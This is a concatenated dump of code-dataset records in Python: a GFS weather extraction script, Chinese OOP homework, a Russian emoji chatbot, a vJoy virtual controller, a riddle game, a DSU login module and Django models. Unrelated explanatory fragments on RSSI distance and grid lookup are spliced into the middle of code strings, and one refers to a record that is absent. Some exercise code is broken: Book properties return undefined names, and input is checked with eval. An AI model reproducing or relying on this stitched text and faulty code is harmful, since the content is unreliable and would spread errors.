OUT_PATH)\n#sys.exit(0)\n\n###########################################\ndef lat_lon_to_y_x(lat,lon,lat_,lon_):\n y = np.argmin(np.abs(lat-lat_))\n x = np.argmin(np.abs(lon-lon_))\n return 
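The localisation record above inverts the log-distance path-loss model: d = 10^((|RSSI| − A) / (10·n)), with A the 1 m reference power in −dBm and n the attenuation exponent (defaults a=54, n=4 in that file). A few worked values:

```python
def rssi_to_distance(rssi, a=54, n=4):
    return 10 ** ((abs(rssi) - a) / (10 * n))

for rssi in (-54, -66, -74):
    print(rssi, '->', round(rssi_to_distance(rssi), 2), 'm')
# -54 -> 1.0 m (the 1 m reference), -66 -> ~2.0 m, -74 -> ~3.16 m
```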
y,x\n\n###########################################\n## 抽出地点と気象変数の指定\nENCODE = \"cp932\"\nSDP_LIST = pd.read_csv(COM.INFO_PATH +\"/\"+ \"sdp_list.csv\", index_col=\"SDP\",encoding=ENCODE)\nGFS_LIST = pd.read_csv(COM.INFO_PATH +\"/\"+ \"gfs_list.csv\", index_col=\"GFS\",encoding=ENCODE)\nVAR_LIST = GFS_LIST[(GFS_LIST.LAYERS>=1)&(GFS_LIST.LAYERS<10)].index.tolist()\n\"\"\"\n# デバッグ用: 地点と変数を制限\nSDP_LIST = SDP_LIST[:4]\nVAR_LIST = ['Temperature_surface']\n\"\"\"\n\n## GFS抽出データの格納先\nGFS_DATA = {}\nfor SDP in SDP_LIST.index: GFS_DATA[SDP] = []\n\nfor GFS in GFS_PATH:\n ###########################################\n ## GFSファイルの参照開始\n data = netCDF4.Dataset(GFS, 'r')\n ## 緯度、経度から配列添字へ\n LAT_ = np.array(data[\"lat\"][:].squeeze())\n LON_ = np.array(data[\"lon\"][:].squeeze())\n ###########################################\n # 抽出地点のループ\n for SDP in SDP_LIST.index[:]:\n NAME = SDP_LIST.loc[SDP,\"NAME\"]\n LAT = SDP_LIST.loc[SDP,\"lat\"]\n LON = SDP_LIST.loc[SDP,\"lon\"]\n y,x = lat_lon_to_y_x(LAT,LON,LAT_,LON_)\n print(sys.argv[0], \"%05d %d %d %.3f %.3f %s\"%(SDP,y,x,LAT,LON,NAME))\n\n ###########################################\n # CSV用データフレームの作成\n time_var = data.variables['time']\n time_vals = num2date(time_var[:].squeeze(), time_var.units)\n\n reftime_var = data.variables['reftime']\n reftime_vals = num2date(reftime_var[:].squeeze(), reftime_var.units)\n\n START = time_vals[0].strftime(\"%Y%m%d %H:%M\")\n END = time_vals[-1].strftime(\"%Y%m%d %H:%M\")\n FREQ = \"%dH\" % int((time_vals[1] - time_vals[0]).seconds/3600)\n\n INDEX = pd.date_range(START, END, freq=FREQ)\n DATAF = pd.DataFrame(index=INDEX)\n DATAF.index = DATAF.index\n DATAF.index.name = GFS_TIME\n\n DATAF[\"reftime\"] = reftime_vals\n\n ## 気象変数のループ\n for NAME in VAR_LIST:\n data_vals = data.variables[NAME][:].squeeze()\n SHAPE = data_vals.shape\n DIM = len(SHAPE)\n NZ = 1 if DIM==3 else SHAPE[1]\n NT = len(INDEX)\n ## 高さ方向のループ\n for z in range(0,NZ):\n c = \"%s_%02d\"%(NAME,z)\n if SHAPE[0]!=NT:\n print(sys.argv[0], \"skip\",NAME)\n DATAF[c] = np.nan\n elif DIM==3:\n DATAF[c] = data_vals[:,y,x]\n elif DIM==4:\n DATAF[c] = data_vals[:,z,y,x]\n\n ###########################################\n ## CSVファイルの保存\n GFS_DATA[SDP] += [DATAF]\n\n ###########################################\n ## GFSファイルの参照終了\n data.close()\n\n###########################################\nPERCENTILES = np.linspace(0.01,0.99,99)\nMEAN_3H = []\nMEAN_1D = []\nfor SDP in SDP_LIST.index:\n print(sys.argv[0], SDP,\"concat and save ...\")\n ## データフレームを結合\n DATA = pd.concat(GFS_DATA[SDP])\n ## 時刻の重複を除去\n DATA[GFS_TIME] = DATA.index\n DATA = DATA.drop_duplicates(subset=GFS_TIME,keep='last')\n DATA = DATA.drop(columns=GFS_TIME)\n ## 指定期間のデータフレームへ\n TEMP = pd.DataFrame(index=pd.date_range(UTC1,UTC2,freq=FREQ))\n DATA = TEMP.join(DATA)\n DATA.index.name = CSV_TIME\n DATA.index = DATA.index + timedelta(hours=CSV_ZONE)\n ## 統計値の計算\n STAT = DATA.describe(percentiles=PERCENTILES)\n MEAN_3H += [DATA.resample(\"3H\").mean()]\n MEAN_1D += [DATA.resample(\"1D\").mean()]\n ## ファイルの保存\n if FORECAST:\n DATA.to_csv(OUT_PATH +\"/\"+ \"%05d.csv\"%SDP)\n else:\n DATA.to_csv(OUT_PATH +\"/\"+ \"%05d.csv\"%SDP)\n #STAT.to_csv(OUT_PATH +\"/\"+ \"%05d_stat.csv\"%SDP)\n\n###########################################\nGFS_MEAN3H = pd.concat(MEAN_3H).describe(percentiles=PERCENTILES)\nGFS_MEAN1D = pd.concat(MEAN_1D).describe(percentiles=PERCENTILES)\nGFS_MEAN3H.to_csv(OUT_PATH +\"/\"+ \"gfs_mean3h.csv\")\nGFS_MEAN1D.to_csv(OUT_PATH +\"/\"+ 
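`lat_lon_to_y_x` in the GFS record above does a nearest-grid-point lookup: argmin of the absolute difference along each coordinate axis. The same idea on an invented grid (the real GFS axes come from the NetCDF file):

```python
import numpy as np

lats = np.arange(20.0, 50.5, 0.5)   # illustrative grid, not the real GFS axes
lons = np.arange(120.0, 150.5, 0.5)

def nearest_yx(lat, lon):
    y = int(np.argmin(np.abs(lats - lat)))
    x = int(np.argmin(np.abs(lons - lon)))
    return y, x

y, x = nearest_yx(35.68, 139.77)    # roughly Tokyo
print(y, x, lats[y], lons[x])       # 31 40 35.5 140.0
```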
\"gfs_mean1d.csv\")\n\n##################################################\nprint(\"leave:\", sys.argv)\nsys.exit(0)\n\n","repo_name":"hshin-git/gfs_rank","sub_path":"2_gfs_to_stat.py","file_name":"2_gfs_to_stat.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4961949185","text":"\"\"\"\n# author Liu shi hao\n# date: 2019/11/18 18:55\n# file_name: task\n\n\"\"\"\n\n\n# 1、定义一个Person类,它包含数据成员age, name和gender。\n# 从Person中派生一个类Employee,在新类中添加一个数据成员,存储个人的number.\n# 再从Employee中派生一个类Executive,每个派生类都应该定义一个方法,来显示相关的信息(名称和类型,如”Fred Smith is an Employee”)。\n# 编写一个列表,包含3个Executive对象,2个一般的Employee对象,然后显示它们的信息。\n#\nclass Person:\n\n def __init__(self, age, name, gender) -> None:\n super().__init__()\n self.age = age\n self.name = name\n self.gender = gender\n\n\nclass Employee(Person):\n\n def __init__(self, age, name, gender, number) -> None:\n super().__init__(age, name, gender)\n self.number = number\n\n def show(self):\n print(f\"{self.name} is an Employee\")\n\n\nclass Executive(Employee):\n\n def show(self):\n print(f\"{self.name} is an Executive\")\n\n\nlist1 = [Executive(53, \"李四\", \"男\", \"001\"),\n Executive(43, \"王五\", \"男\", \"011\"),\n Executive(23, \"赵月\", \"女\", \"006\"),\n Employee(25, \"张三\", \"男\", \"001\"),\n Employee(29, \"陈东\", \"男\", \"211\")]\n\n\ndef show_all():\n for i in range(len(list1)):\n list1[i].show()\n\n\n# show_all()\n# 2、设计一个图书管理系统,基类为类Book,要求有书名和作者属性,\n# 由Book类派生子类AudioBook(有声书,需要具有演说者属性),\n# 对于Book和AudioBook进行合理的属性及行为的抽象,\n# 同时实现该类的控制台打印方法\n#\nclass Book:\n\n def __init__(self, title, author) -> None:\n super().__init__()\n self.title = title\n self.author = author\n\n @property\n def title(self):\n return title\n\n @property\n def author(self):\n return author\n\n\nclass AudioBook(Book):\n\n def __init__(self, title, author, speaker, gender) -> None:\n super().__init__(title, author)\n self.speaker = speaker\n self.gender = gender\n\n def speak(self):\n print(f\"下面请收听演说者{self.speaker},{self.gender},演说:{self.author}的作品<<{self.title}>>。\")\n\n\na1 = AudioBook(\"老人与海\", \"欧内斯特·米勒尔·海明威\", \"张三\", \"男\")\n\n\n# a1.speak()\n# 3、以点(Point)类为基类,重新定义矩形类和圆类Rectangle class and circle class。点为直角坐标点,矩形水平放置,由左下方的顶点和长宽定义。\n# 圆由圆心和半径定义。派生类操作判断任一坐标点是在图形内,还是在图形的边缘上,还是在图形外。缺省初始化图形退化为点。\n# 要求包括拷贝初始化方法。编程测试类设计是否正确。\n#\nclass Point:\n\n def __init__(self, x, y) -> None:\n super().__init__()\n self.x = x\n self.y = y\n\n @property\n def x(self):\n return self.__x\n\n @x.setter\n def x(self, value):\n if type(eval(str(value))) == int:\n self.__x = int(value)\n elif type(eval(str(value))) == float:\n self.__x = float(value)\n else:\n print(\"格式错误,无法画图!\")\n pass\n\n @property\n def y(self):\n return self.__y\n\n @y.setter\n def y(self, value):\n if type(eval(str(value))) == int:\n self.__y = int(value)\n elif type(eval(str(value))) == float:\n self.__y = float(value)\n else:\n print(\"格式错误,无法画图!\")\n pass\n\n\nclass Rectangle(Point):\n\n def __init__(self, x, y, length, width) -> None:\n super().__init__(x, y)\n self.length = length\n self.width = width\n\n @property\n def length(self):\n return self.__length\n\n @length.setter\n def length(self, value):\n if type(eval(str(value))) == int:\n self.__length = int(value)\n elif type(eval(str(value))) == float:\n self.__length = float(value)\n else:\n print(\"格式错误,无法画出矩形!\")\n pass\n\n @property\n def width(self):\n return self.__width\n\n @width.setter\n def width(self, value):\n if type(eval(str(value))) == int:\n self.__width = 
int(value)\n elif type(eval(str(value))) == float:\n self.__width = float(value)\n else:\n print(\"格式错误,无法画出矩形!\")\n pass\n\n def judge(self, r_x, r_y):\n j1 = r_x - self.x\n j2 = r_y - self.y\n j3 = self.width+self.y - r_y\n j4 = self.length+self.x - r_x\n if min(j1,j2,j3,j4)==0:\n print(\"在矩形上\")\n elif max(j1,j2,j3,j4) < self.length and max(j1,j2,j3,j4) < self.width:\n print(\"在矩形内\")\n else:\n print(\"在矩形外\")\n\nclass Circle(Point):\n\n def __init__(self, x, y,r) -> None:\n super().__init__(x, y)\n self.r = r\n @property\n def r(self):\n return self.__r\n\n @r.setter\n def r(self, value):\n if type(eval(str(value))) == int:\n self.__r = int(value)\n elif type(eval(str(value))) == float:\n self.__r = float(value)\n else:\n print(\"格式错误,无法画出圆!\")\n pass\n def judge(self, r_x, r_y):\n\n if (r_x - self.x) ** 2 + (r_y - self.y) ** 2 == self.r**2:\n print(\"在圆上\")\n elif (r_x - self.x) ** 2 + (r_y - self.y) ** 2 < self.r**2:\n print(\"在圆内\")\n else:\n print(\"在圆外\")\n\n# c1 = Circle(0,0,2)\n# c1.judge(2,1)\n# r1 = Rectangle(0,0,3,4)\n# r1.judge(3,1)\n# 4、对平面形体有长和面积,周长、面积应怎样计算(用什么方法)?要求实现运行时的多态性。请编程,并测试。\n# Shape\n# 正方形(Square) 长方形(Rectangle) 圆形(Circle) 圆环(Annulus)\n#\nimport math\n\n\nclass Shape:\n def __init__(self, name) -> None:\n super().__init__()\n self.name = name\n\n def perimeter(self):\n pass\n\n\nclass Square(Shape):\n\n def __init__(self, name, length, area) -> None:\n super().__init__(name)\n self.length = length\n self.area = area\n\n def perimeter(self):\n w = self.area / self.length\n perimeter = 2 * (w + self.length)\n print(f\"{self.name}的周长是{perimeter}\")\n\n\nclass Rectangle(Square):\n pass\n\n\nclass Circle(Shape):\n\n def __init__(self, name, length, area) -> None:\n super().__init__(name)\n self.length = length\n self.area = area\n\n def perimeter(self):\n perimeter = 2 * self.length * math.pi\n print(f\"{self.name}的周长是{perimeter}\")\n\nclass Annulus(Circle):\n\n def perimeter(self):\n perimeter = 2 * (self.area /self.length )\n print(f\"{self.name}的周长是{perimeter}\")\n\n\nclass Count:\n def change(self, shape: Shape):\n print(f\"切换图形到{shape.name}\")\n shape.perimeter()\n\ns1 = Count()\ns1.change(Rectangle(\"正方形\",2,4))\n\n\n# 5、某公司雇员(Employee)包括经理(Manager),技术人员(Technician)和销售员(Salesman)。以Employee类为基类派生出Manager,Technician和Salesman类;Employee类的属性包括姓名、职工号、工资级别,月薪(实发基本工资加业绩工资)。操作包括月薪计算方法(pay()),该方法要求输入请假天数,扣去应扣工资后,得出实发基本工资。\n# Technician类派生的属性有每小时附加酬金和当月工作时数,及研究完成进度系数。业绩工资为三者之积。也包括同名的pay()方法,工资总额为基本工资加业绩工资。\n# Salesman类派生的属性有当月销售额和酬金提取百分比,业绩工资为两者之积。也包括同名的pay()方法,工资总额为基本工资加业绩工资。\n# Manager类派生属性有固定奖金额和业绩系数,业绩工资为两者之积。工资总额也为基本工资加业绩工资。编程实现工资管理。","repo_name":"1987617587/lsh_py","sub_path":"basics/day10/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"4091368349","text":"'''\nCreated on 2013. 1. 
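The Point/Rectangle/Circle exercise above validates setter inputs with `type(eval(str(value)))`, which executes arbitrary strings. A safer equivalent, reduced to one coordinate for brevity (my rewrite, not the exercise's required solution):

```python
class Point:
    def __init__(self, x):
        self.x = x

    @property
    def x(self):
        return self._x

    @x.setter
    def x(self, value):
        # isinstance replaces eval(); bool is excluded because it subclasses int
        if isinstance(value, (int, float)) and not isinstance(value, bool):
            self._x = float(value)
        else:
            raise TypeError("x must be a number")

p = Point(1.5)
print(p.x)  # 1.5
```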
23.\n\n@author: stmkmk\n'''\nimport time\n\nstart = time.time()\n\nfor i in range(10):\n for j in range(100):\n print('[%s] => %s' %(i,j))\n \nprint('Elapsed time :%s' %(time.time() - start)) ","repo_name":"gramman75/programming_python","sub_path":"book/chapter02/not-thread-class.py","file_name":"not-thread-class.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22179105775","text":"import numpy\nemojis_0_face_smiling = ['😀','😃','😄','😁','😆','😂','🙂','🤩','🥳'] #=)\nemojis_1_face_concerned =['😫','😩','😓','☹','🙁','😟','😞','😣','😖'] #=(\nemojis_2_face_negative = ['👿','😬','😤','😡','👺','💀','😠','🤯','🤨'] #=\\\n\nhello_messages = ['Привет! Отличное натроение!', \"Привет, не грусти!\", \"Привет, хватит злиться! я не виноват!!!\"]\n\ndef choise_emoji(emj):\n if emj in emojis_0_face_smiling:\n return 0\n elif emj in emojis_1_face_concerned:\n return 1\n elif emj in emojis_2_face_negative:\n return 2\n else:\n return 3\n\ntype_messages = {\n '00':['Радуюсь вместе с тобой)',\n \"Ты в отличном настроении!\",\n \"Ты такой счастливый.\",\n \"Отличный день!\",\n \"С тобой приятно общаться\",\n \"Ты на позитиве!\",\n \"Тебе так весело)\"],\n '01': ['Что произошло?',\n \"Тебе стало грустно, я попытаюсь поднять тебе настроение!\\nЩа анекдот расскажу!\\nЖена: У вас, у мужиков, на уме только секс, а нам, женщинам, нужно внимание…\\nMуж: Внимание!!! Сейчас будет секс!\",\n \"Ты расстроился... я вместе с тобой(\",\n \"Тебя что-то расстроило...\",\n \"ээээээ, не грусти! надеюсь, это не я тебя расстроил 😞\"],\n '02': [\"это я тебя разозлил?! Я же ничего не сделааааал!\",\n \"Не злись.... все же было хорошо\",\n \"Ща пошучу...\\nУчитель физики: - Вова, назови мне вещество, которое переходит из твердого состояния в газообразное, минуя жидкую фазу.\\n- Вячеслав Иванович, это горох!\"],\n '10': [\"ты в хорошем настоении! Я рад)\",\n \"Твое настроение улучшилось!\",\n \"я радуюсь вместе с тобой)\"],\n '11': [\"Может анекдот тебе поможет. Папа научил маленького Вовочку считать, теперь папе приходится делить пельмени поровну.\",\n \"Ты серьезно расстроен\",\n \"Ну хватит грустить!!!\"],\n '12': [\"Какая быстрая смена настрения... я вас, кожанных, не понимаю!\",\n \"Я не хотел тебя злить!\",\n \"Прости, если это я тебя разозлил =(\"],\n '20': [\"Ты повеселел.\",\n \"Тебе стало лучше)\"],\n '21': [\"Теперь ты грустишь...\",\n \"Люди.... 
вас не возможно понять, откуда столько эмоций?!\",\n \"Может я смогу исправить твое настроение...В школе Васю все боялись и уважали, все знали, что он занимается карате.\\n В школу пришел новенький и побил Васю, он не знал, что Вася занимается карате.\"],\n '22': [\"Ну ты и злюка\",\n \"Прекращай злиться\",\n \"я не собирался портить тебе настроение =(\",\n \"Может я смогу исправить твое настроение...В школе Васю все боялись и уважали, все знали, что он занимается карате.\\n В школу пришел новенький и побил Васю, он не знал, что Вася занимается карате.\"]\n}\n\n\ndef unknown_message():\n return \"Я тебя не понимаю\\nБеседа обнуляется\"\n\ndef choise_text(emj,Bot,last=''):\n if last != '':\n id = choise_emoji(emj)\n if id == 3:\n Bot.last=''\n return unknown_message()\n else:\n Bot.last = str(id)\n return numpy.random.choice(type_messages[last+str(id)], size=1)[0]\n else:\n id =choise_emoji(emj)\n if id == 3:\n Bot.last = ''\n return unknown_message()\n else:\n Bot.last = str(id)\n return hello_messages[id]\n","repo_name":"KseniiaKarpova/chatBot_testTask","sub_path":"emotions.py","file_name":"emotions.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40062058995","text":"import warnings\n\nPYVJOY_IMPORT_SUCCESSFUL = False\nPYNPUT_IMPORT_SUCCESSFUL = False\n\ntry:\n import pyvjoy\n\n PYVJOY_IMPORT_SUCCESSFUL = True\n from pynput.keyboard import Key, Listener\n\n PYNPUT_IMPORT_SUCCESSFUL = True\nexcept ModuleNotFoundError:\n warnings.warn(F\"Not all virtual_controller modules were imported correctly.\"\n F\" pyvjoy: {PYVJOY_IMPORT_SUCCESSFUL}. pynput: {PYNPUT_IMPORT_SUCCESSFUL}\"\n F\"\\nPlease install the modules to use virtual_controller.\")\n\nVJOY_INSTALLED = True\n\n\ndef vjoy_accessible():\n global VJOY_INSTALLED, PYVJOY_IMPORT_SUCCESSFUL\n return VJOY_INSTALLED and PYVJOY_IMPORT_SUCCESSFUL\n\n\ndef pynput_vjoy_accessible():\n global PYNPUT_IMPORT_SUCCESSFUL\n return PYNPUT_IMPORT_SUCCESSFUL and vjoy_accessible()\n\n\nVJOY_VALUE = 1\n\n\nclass VirtualController:\n run_listeners: bool\n listener_closed: bool\n\n def __init__(self, fix_airsim: bool = True, keyboard_listeners: bool = True):\n \"\"\"\n\n \"\"\"\n self.listener_thread = None\n global VJOY_INSTALLED\n self.keyboard_listeners = keyboard_listeners\n if not vjoy_accessible():\n return\n self.fix_airsim = fix_airsim\n try:\n self.j = pyvjoy.VJoyDevice(1)\n VJOY_INSTALLED = True\n except pyvjoy.vJoyException:\n VJOY_INSTALLED = False\n self.run_listeners = keyboard_listeners\n self.listener_closed = False\n\n self.listener_active = False\n self.listener: Listener = Listener(\n on_press=self.on_press,\n on_release=self.on_release)\n\n def on_press(self, key):\n if not self.listener_active:\n return\n\n if str(key) == 'Key.right':\n self.move_right(VJOY_VALUE)\n if str(key) == 'Key.left':\n self.move_right(-VJOY_VALUE)\n if str(key) == 'Key.up':\n self.move_forward(VJOY_VALUE)\n if str(key) == 'Key.down':\n self.move_forward(-VJOY_VALUE)\n\n if str(key) == \"'d'\":\n self.clockwise(VJOY_VALUE)\n if str(key) == \"'a'\":\n self.clockwise(-VJOY_VALUE)\n if str(key) == \"'w'\":\n self.throttle(VJOY_VALUE)\n if str(key) == \"'s'\":\n self.throttle(-VJOY_VALUE)\n\n if not self.run_listeners:\n self.reset()\n return False\n\n def on_release(self, key):\n if not self.listener_active:\n return\n\n if str(key) == 'Key.right' or str(key) == 'Key.left':\n self.move_right(0)\n if str(key) == 'Key.up' or str(key) == 'Key.down':\n 
self.move_forward(0)\n\n if str(key) == \"'d'\" or str(key) == \"'a'\":\n self.clockwise(0)\n if str(key) == \"'w'\" or str(key) == \"'s'\":\n self.throttle(0)\n\n if key == Key.esc:\n self.reset()\n # Stop listener\n return False\n\n if not self.run_listeners:\n self.reset()\n return False\n\n def enable(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not pynput_vjoy_accessible():\n return\n\n self.listener_active = True\n\n def disable(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not pynput_vjoy_accessible():\n return\n\n self.listener_active = False\n\n self.reset()\n\n def throttle(self, val: float):\n \"\"\"\n\n :param val: between -1 and 1\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n try:\n if self.fix_airsim:\n self.j.set_axis(pyvjoy.HID_USAGE_Y, self._get_val(-val))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_X, self._get_val(val))\n except pyvjoy.vJoyException:\n \"\"\n\n def clockwise(self, val: float):\n \"\"\"\n\n :param val: between -1 and 1\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n try:\n if self.fix_airsim:\n self.j.set_axis(pyvjoy.HID_USAGE_X, self._get_val(val))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_Y, self._get_val(val))\n except pyvjoy.vJoyException:\n \"\"\n\n def move_right(self, val: float):\n \"\"\"\n\n :param val: between -1 and 1\n :return: wAxisVBRX\n \"\"\"\n if not vjoy_accessible():\n return\n try:\n if self.fix_airsim:\n self.j.set_axis(pyvjoy.HID_USAGE_RX, self._get_val(val))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_RX, self._get_val(val))\n except pyvjoy.vJoyException:\n \"\"\n\n def move_forward(self, val: float):\n \"\"\"\n\n :param val: between -1 and 1\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n try:\n if self.fix_airsim:\n self.j.set_axis(pyvjoy.HID_USAGE_RY, self._get_val(-val))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_RY, self._get_val(val))\n except pyvjoy.vJoyException:\n \"\"\n\n def update(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n # self.j.update()\n\n def reset(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not vjoy_accessible():\n return\n\n self.move_forward(0)\n self.move_right(0)\n self.throttle(0)\n self.clockwise(0)\n\n @staticmethod\n def _get_val(val):\n return int(val * 0x4000) + 0x4000\n\n def __enter__(self) -> \"VirtualController\":\n \"\"\"\n\n :return:\n \"\"\"\n self.listener.start()\n return self\n\n def __exit__(self, *args):\n \"\"\"\n\n :param args:\n :return:\n \"\"\"\n self.listener.stop()\n\n\nif __name__ == \"__main__\":\n cont = VirtualController()\n cont.enable()\n input()\n cont.disable()\n cont.throttle(1)\n cont.clockwise(1)\n cont.move_right(1)\n cont.move_forward(1)\n input()\n cont.throttle(-1)\n cont.clockwise(-1)\n cont.move_right(-1)\n cont.move_forward(-1)\n input()\n","repo_name":"Asif-Rot/Robotics_ex1","sub_path":"simple_airsim/api/virtual_controller.py","file_name":"virtual_controller.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70094087289","text":"from my_modules.riddle_game_3 import create_riddles_dictionary, guess_riddle, add_result, print_results\n\n\n''' Задание_6\nДобавьте в модуль с загадками функцию, которая принимает на вход строку (текст загадки) и число (номер попытки, с которой она угадана).\n📌Функция формирует словарь с информацией о результатах отгадывания.\n📌Для хранения используйте защищённый словарь уровня модуля.\n📌Отдельно напишите функцию, которая выводит результаты угадывания из защищённого словаря в 
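`_get_val` in the `virtual_controller.py` record above maps a normalized axis input in [−1, 1] onto the vJoy integer range [0x0, 0x8000], with 0x4000 as the centred/neutral value. The arithmetic, tabulated:

```python
def axis_value(val: float) -> int:
    return int(val * 0x4000) + 0x4000

for v in (-1.0, -0.5, 0.0, 0.5, 1.0):
    print(f"{v:+.1f} -> 0x{axis_value(v):04X}")
# -1.0 -> 0x0000, -0.5 -> 0x2000, 0.0 -> 0x4000, +0.5 -> 0x6000, +1.0 -> 0x8000
```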
удобном для чтения виде.\n📌Для формирования результатов используйте генераторное выражение.\n'''\n\n\ndef main():\n riddles = create_riddles_dictionary()\n attempts = 3\n print(f\"Загадки: \\n{riddles.keys()}\")\n print(f'Осталось попыток: {attempts}')\n for riddle, options in riddles.items():\n result = guess_riddle(riddle, options, attempts)\n if result > 0:\n print(f\"Загадка отгадана с {result} попытки.\")\n else:\n print(\"Вы исчерпали все попытки. Попробуйте еще раз!\")\n add_result(riddle, result)\n print_results()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"m1644/Seminar_06","sub_path":"Seminar/sem_06.py","file_name":"sem_06.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7574084397","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input().strip())\r\n\r\narr = list(map(int,input().split()))\r\nfor i,v in enumerate(arr):\r\n arr[i] = [v,i + 1]\r\nx = 0\r\nanswer = []\r\n\r\nwhile True:\r\n t = arr.pop(x)\r\n answer.append(t[1])\r\n if len(arr) == 0:\r\n break\r\n if t[0] > 0:\r\n t[0] -= 1\r\n x = (x + t[0]) % len(arr)\r\n\r\n\r\n\r\n\r\nprint(*answer)\r\n","repo_name":"wjs2063/BaekJoon","sub_path":"백준/Silver/2346. 풍선 터뜨리기/풍선 터뜨리기.py","file_name":"풍선 터뜨리기.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25433096548","text":"#@title A2/DSU_Login {display-mode: \"form\"}\n#Last Edit: 2020/11/27\nfrom a1 import *\nfrom a4 import * #NaClProfile\n\n#@title Other Mod {display-mode: \"form\"}\ndef joinmsg(username, pwd):\n msg = '{\"join\": {\"username\":\"'+username+'\", \"password\":\"'+pwd+'\"}}'\n return msg\n\ndef biomsg(msg):\n msg = '{\"bio\": {\"entry\":\"'+msg+'\", \"timestamp\":\"'+str(time.time())+'\"}}'\n return msg\n\ndef postmsg(msg):\n msg = '{\"post\": {\"entry\":\"'+msg+'\", \"timestamp\":\"'+str(time.time())+'\"}}'\n return msg\n\n\ndef Log_In(uri,parent_address,prof):\n print(\"[LogIn Interface]\")\n while True:\n cmd = input(\"\"\"\n Press [X] to execute the corresponding commands \n -[C]reate an Account\n -[L]oad an pre-existing DSU file to LogIn\n -[Q]uit to quit the program\n \"\"\")\n if cmd == \"C\":\n User_Name = input(\"User Name:\")\n temp = \"\"\n for i in User_Name.split(\" \"):\n temp += i + \"_\"\n User_Name = temp[0:-1]\n check_existance = 'L ' + parent_address + ' -r -s ' + \"{}_user_file.dsu\".format(User_Name)\n if File_Exp(check_existance,RETURN=True) != [] :\n print(\"ERROR! 
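The riddle task above (results stored in a module-level protected dictionary, report built with a generator expression) imports `add_result`/`print_results` from `my_modules.riddle_game_3`, which is not shown in this record. A guess at what those functions might look like, per the task description:

```python
_results = {}  # module-level "protected" store, as the task requires

def add_result(riddle: str, attempt: int) -> None:
    _results[riddle] = attempt

def print_results() -> None:
    lines = (f"{r}: solved on attempt {a}" if a > 0 else f"{r}: not solved"
             for r, a in _results.items())   # generator expression, per the task
    print("\n".join(lines))

add_result("What has keys but no locks?", 2)
add_result("What gets wetter as it dries?", -1)
print_results()
```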
Name already token, please register with another name!\")\n continue\n else:\n pass # Name avaliable\n prof = NaClProfile(uri,User_Name)\n prof.bio = input(\"Leave a Bio!Tell us more about yourself!\")\n try:\n file_name = \"{}_user_file\".format(User_Name)\n entry = \"C {} -n {}\".format(parent_address,file_name)\n file_path = File_Exp(entry,RETURN= True)\n print(\"file_path:\",file_path)\n prof.save_profile(file_path) #Dump the information into the file\n except:\n print(\"Error,fail to create account\")\n elif cmd == \"L\":\n User_Name = input(\"Please Enter Your Account Name\")\n temp = \"\"\n for i in User_Name.split(\" \"):\n temp += i + \"_\"\n User_Name = temp[0:-1]\n file_name = User_Name + \"_user_file.dsu\"\n entry = 'L ' + parent_address + ' -r -s ' + file_name\n try:\n file_path = File_Exp(entry,True)[0]\n except IndexError:\n print(\"Error,file not found.\")\n continue\n prof.load_profile(file_path)\n message = joinmsg(prof.private_key,prof.public_key)\n print(prof.get_posts())\n print(\"Welcome!!!\")\n return message, file_path, prof\n elif cmd == \"Q\":\n return (\"QUIT\",\"QUIT\",prof)\n else:\n print(\"Please LogIn First!\")\n","repo_name":"Ryan47Liao/Distributive-Social-Communication-Platform","sub_path":"dsu_login.py","file_name":"dsu_login.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74070128888","text":"from django.db import models\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save, pre_save\nfrom django.db.utils import DatabaseError\nfrom django.db.models import Q\nfrom django.utils.functional import cached_property\nfrom common.models import BaseModel\n\n\nclass UserProfile(BaseModel):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, related_name=\"profile\"\n )\n profession = models.CharField(\n help_text=\"What do you do?\",\n max_length=200,\n default=\"I work/study at ...\"\n )\n about = models.TextField(\n help_text=\"Few lines about yourself\",\n default=\"I like ...\"\n )\n github_url = models.URLField(blank=True, null=True)\n bitbucket_url = models.URLField(blank=True, null=True)\n twitter_url = models.URLField(blank=True, null=True)\n learned_about_pssi = models.TextField(\n \"How did you come to know about PSSI?\",\n default=\"I came to know about PSSI from ...\"\n )\n\n def __str__(self):\n return self.user.get_full_name()\n\n @cached_property\n def is_pssi_member(self):\n now = timezone.now()\n return self.membership_history.filter(\n from_date__lte=now,\n to_date__gte=now,\n ).count() > 0\n\n\nclass MembershipApplication(BaseModel):\n APPLICATION_STATUS_CHOICES = (\n ('u', 'Under Review'),\n ('a', 'Approved'),\n ('r', 'Rejected'),\n )\n\n profile = models.OneToOneField(\n 'UserProfile'\n )\n status = models.CharField(\n \"Membership Application Status\", max_length=1,\n 